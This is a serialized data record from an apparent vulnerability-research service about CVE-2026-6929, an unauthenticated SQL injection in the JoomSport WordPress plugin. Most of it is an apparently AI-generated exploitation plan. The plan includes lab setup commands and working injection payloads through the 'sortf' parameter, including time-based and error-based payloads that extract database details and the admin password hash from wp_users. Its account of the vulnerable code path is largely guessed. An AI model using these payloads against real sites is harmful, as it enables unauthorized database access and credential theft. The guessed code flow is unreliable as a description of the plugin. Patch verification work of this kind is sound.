[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYoUTPkzVMntsEcTJswP2VNq6mfN0tWFHIEH09Hf8LzM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":35},"CVE-2026-6929","joomsport-unauthenticated-sql-injection-via-sortf-parameter","JoomSport \u003C= 5.7.7 - Unauthenticated SQL Injection via 'sortf' Parameter","The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'sortf' parameter in all versions up to, and including, 5.7.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","joomsport-sports-league-results-management",null,"\u003C=5.7.7","5.7.8","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-12 17:13:07","2026-05-13 05:29:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F28b730b3-4260-414f-8a4a-65ba5509449b?source=api-prod",1,[22,23,24,25,26,27],"includes\u002Fjoomsport-actions.php","includes\u002Fjoomsport-shortcodes.php","includes\u002Fmeta-boxes\u002Fjoomsport-meta-tournament.php","includes\u002Fpages\u002Fjoomsport-page-extrafields.php","joomsport.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-6929 (JoomSport SQL Injection)\n\n## 1. Vulnerability Summary\nThe **JoomSport** plugin (versions \u003C= 5.7.7) is vulnerable to **unauthenticated time-based blind SQL Injection**. The vulnerability exists in the handling of the `sortf` (sort field) parameter, which is used to dynamically order SQL queries without proper sanitization or preparation. Because this parameter is directly concatenated into an `ORDER BY` or similar clause, an attacker can inject arbitrary SQL commands. The \"unauthenticated\" nature of the vulnerability suggests it is reachable via public-facing shortcodes or `wp_ajax_nopriv` handlers.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** A WordPress page containing the `[jsStandings]` or `[jsPlayerStat]` shortcode, or the `admin-ajax.php` endpoint.\n*   **Hook\u002FAction:** Likely processed within the `JoomsportShortcodes::joomsport_standings` or a related AJAX action called by the frontend scripts (e.g., `jsjoomsport-standings`).\n*   **Vulnerable Parameter:** `sortf` (and potentially `sortd` for sort direction).\n*   **Authentication:** None required (Unauthenticated).\n*   **Preconditions:** A tournament and season must be configured so that the plugin executes the vulnerable database queries to render the standings or player lists.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user visits a page containing the `[jsStandings]` shortcode with a `sortf` parameter in the URL.\n2.  **Shortcode Handling:** `JoomsportShortcodes::joomsport_standings($attr)` is triggered.\n3.  **Object Initialization:** The code instantiates `classJsportSeason` (defined in `sportleague\u002Fclasses\u002Fclass-jsport-season.php`).\n4.  **Data Processing:** The season object calls `calculateTable()` or `getLists()`.\n5.  **Vulnerable Sink:** Inside the core logic (likely in `sportleague\u002Fmodels\u002F` or `sportleague\u002Fclasses\u002F`), the code retrieves `$_REQUEST['sortf']`.\n6.  **SQL Execution:** The value is concatenated into a `$wpdb->get_results()` query string to handle column sorting (e.g., `... ORDER BY {$sortf} {$sortd}`).\n\n## 4. Nonce Acquisition Strategy\nBased on the plugin's architecture in `includes\u002Fjoomsport-actions.php` and `includes\u002Fjoomsport-shortcodes.php`, nonces are often used for admin actions (like `joomsport_order_matchdays`), but frontend viewing shortcodes typically do not require nonces for simple GET-based sorting. \n\nHowever, if the injection occurs via an AJAX request triggered by `joomsport_standings.js`:\n1.  **Identify the Script:** `JoomsportShortcodes::joomsport_standings` enqueues `jsjoomsport-standings`.\n2.  **Create Page:** `wp post create --post_type=page --post_status=publish --post_content='[jsStandings id=\"1\"]'` (using an actual Season ID).\n3.  **Navigate:** Use the browser to visit the page.\n4.  **Extract:** If localized data exists, it might be in a variable like `jsStandingsObj`. Use `browser_eval(\"window.jsStandingsObj?.nonce\")`. \n*Note: If the vulnerability is truly unauthenticated and reachable via simple GET, the nonce acquisition step may be skipped.*\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload via a GET request.\n\n*   **Step 1: Identification**\n    Target a page with the standings shortcode.\n    `GET \u002F?page_id=XX&sortf=1` (Baseline)\n*   **Step 2: Injection**\n    Inject a `SLEEP()` command into the `sortf` parameter.\n    *   **Payload:** `(SELECT(1)FROM(SELECT(SLEEP(5)))a)`\n    *   **Full URL:** `http:\u002F\u002Flocalhost:8080\u002F?page_id=XX&sortf=(SELECT(1)FROM(SELECT(SLEEP(5)))a)`\n*   **Step 3: Verification**\n    If the response is delayed by ~5 seconds, SQL injection is confirmed.\n\n## 6. Test Data Setup\nThe plugin requires a valid Tournament and Season structure to execute the vulnerable queries.\n1.  **Create Tournament:** \n    `wp term create joomsport_tournament \"Major League\" --description=\"Test Tournament\"`\n2.  **Create Season:** \n    `wp post create --post_type=joomsport_season --post_title=\"Season 2026\" --post_status=publish`\n3.  **Identify IDs:** Get the ID of the created Season (e.g., `123`).\n4.  **Create Page:** \n    `wp post create --post_type=page --post_title=\"Standings\" --post_status=publish --post_content='[jsStandings id=\"123\"]'`\n5.  **Create Participants:** Use `wp post create --post_type=joomsport_team` to add at least two teams and link them to the season (this may require setting `_joomsport_season_teams` in post meta).\n\n## 7. Expected Results\n*   **Vulnerable Response:** The HTTP request takes significantly longer than the baseline (e.g., 5+ seconds).\n*   **Data Extraction (Manual Verification):** An attacker could extract the database version or admin password hashes using conditional time delays:\n    `sortf=(SELECT IF(SUBSTRING(version(),1,1)='5',SLEEP(5),0))`\n\n## 8. Verification Steps\n1.  **Monitor MySQL Logs:** Enable the general log in MySQL to see the raw query being executed.\n    `SET GLOBAL general_log = 'ON';`\n2.  **Check Query:** Look for the injected `SLEEP` command inside an `ORDER BY` clause in the log.\n3.  **Confirm Patched Version:** Upgrade to 5.7.8 and verify the same payload no longer causes a delay.\n\n## 9. Alternative Approaches\n*   **Boolean-based:** If the page content changes based on the sort (e.g., order of teams), use `sortf=IF(1=1, team_name, id)` vs `sortf=IF(1=2, team_name, id)`.\n*   **Error-based:** Try triggering a database error to extract data via `GTID_SUBSET` or `updatexml`:\n    `sortf=updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)`\n*   **AJAX Endpoint:** If the GET request doesn't work, check for an AJAX action named `joomsport_standings_load` or similar by inspecting the `sportleague\u002Fassets\u002Fjs\u002Fjoomsport_standings.js` file.","gemini-3-flash-preview","2026-05-14 17:51:40","2026-05-14 17:52:33",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","5.7.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjoomsport-sports-league-results-management\u002Ftags\u002F5.7.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjoomsport-sports-league-results-management.5.7.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjoomsport-sports-league-results-management\u002Ftags\u002F5.7.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjoomsport-sports-league-results-management.5.7.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjoomsport-sports-league-results-management\u002Ftags"]